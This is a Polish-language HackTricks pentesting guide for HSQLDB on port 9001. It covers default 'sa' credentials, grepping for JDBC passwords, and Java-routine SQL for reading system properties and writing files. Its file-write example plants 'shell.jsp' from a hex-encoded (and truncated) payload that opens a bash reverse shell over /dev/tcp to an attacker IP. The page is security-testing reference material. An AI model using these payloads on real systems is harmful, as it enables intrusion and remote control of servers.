hacktricks/network-services-pentesting/9001-pentesting-hsqldb.md

<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.

</details>


# Podstawowe informacje

**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** to wiodący system relacyjnej bazy danych SQL napisany w języku Java. Oferuje mały, szybki, wielowątkowy i transakcyjny silnik bazy danych z tabelami w pamięci i na dysku oraz obsługę trybów osadzonego i serwerowego.

**Domyślny port:** 9001
```text
9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# Informacje

### Domyślne ustawienia

Należy pamiętać, że domyślnie usługa ta prawdopodobnie działa w pamięci lub jest powiązana z lokalnym hostem. Jeśli ją znalazłeś, prawdopodobnie wykorzystałeś inną usługę i szukasz podniesienia uprawnień.

Domyślne dane uwierzytelniające to zazwyczaj `sa` z pustym hasłem.

Jeśli wykorzystałeś inną usługę, wyszukaj możliwe dane uwierzytelniające, używając
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
Zwróć uwagę na nazwę bazy danych - będziesz jej potrzebować do połączenia.

# Pozyskiwanie informacji

Połącz się z instancją bazy danych, pobierając [HSQLDB](https://sourceforge.net/projects/hsqldb/files/) i rozpakowując `hsqldb/lib/hsqldb.jar`. Uruchom aplikację GUI \(ble\) za pomocą polecenia `java -jar hsqldb.jar` i połącz się z instancją, używając odkrytych/słabych danych uwierzytelniających.

Zwróć uwagę, że adres URL połączenia będzie wyglądał mniej więcej tak dla zdalnego systemu: `jdbc:hsqldb:hsql://ip/DBNAME`.

# Sztuczki

## Rutyny języka Java

Możemy wywoływać statyczne metody klasy Java z HSQLDB za pomocą Rutyn Języka Java. Należy pamiętać, że wywoływana klasa musi znajdować się w ścieżce aplikacji.

Rutyny Języka Java mogą być `funkcjami` lub `procedurami`. Funkcje można wywoływać za pomocą instrukcji SQL, jeśli metoda Java zwraca jedną lub więcej zmiennych prymitywnych zgodnych z SQL. Są one wywoływane za pomocą instrukcji `VALUES`.

Jeśli metoda Java, którą chcemy wywołać, zwraca void, musimy użyć procedury wywołanej za pomocą instrukcji `CALL`.

## Odczytywanie właściwości systemowych Javy

Utwórz funkcję:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
Wykonaj funkcję:
```text
VALUES(getsystemproperty('user.name'))
```
Możesz znaleźć [listę właściwości systemowych tutaj](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).

## Zapisz zawartość do pliku

Możesz użyć narzędzia `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` w Javie, które znajduje się w JDK (automatycznie ładowane do ścieżki klasy aplikacji), aby zapisywać elementy zakodowane w formacie szesnastkowym na dysku za pomocą niestandardowej procedury. **Zwróć uwagę na maksymalny rozmiar 1024 bajtów**.

Utwórz procedurę:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
Wykonaj procedurę:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
<details>

<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Inne sposoby wsparcia HackTricks:

* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.

</details>